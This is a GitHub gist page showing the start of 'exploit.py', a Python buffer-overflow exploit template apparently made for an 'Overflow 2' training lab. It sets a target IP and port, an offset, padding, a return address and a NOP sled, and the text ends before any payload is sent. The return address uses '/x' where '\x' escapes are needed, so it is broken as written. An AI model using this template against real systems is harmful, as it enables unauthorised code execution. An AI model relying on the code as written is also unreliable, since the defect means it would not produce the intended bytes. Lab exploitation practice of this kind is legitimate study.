Skip to content

Instantly share code, notes, and snippets.

View an0th3rhuman's full-sized avatar
👋
Hi there!

Raghul M an0th3rhuman

👋
Hi there!
View GitHub Profile
@an0th3rhuman
an0th3rhuman / exploit.py
Created February 13, 2021 07:02
Overflow 2 exploit code
import socket
ip = "10.10.172.142"
port = 1337
prefix = "OVERFLOW2 "
offset = 634
overflow = "A" * offset
retn = "/xDF/x11/x50/x62"
padding = "\x90" *16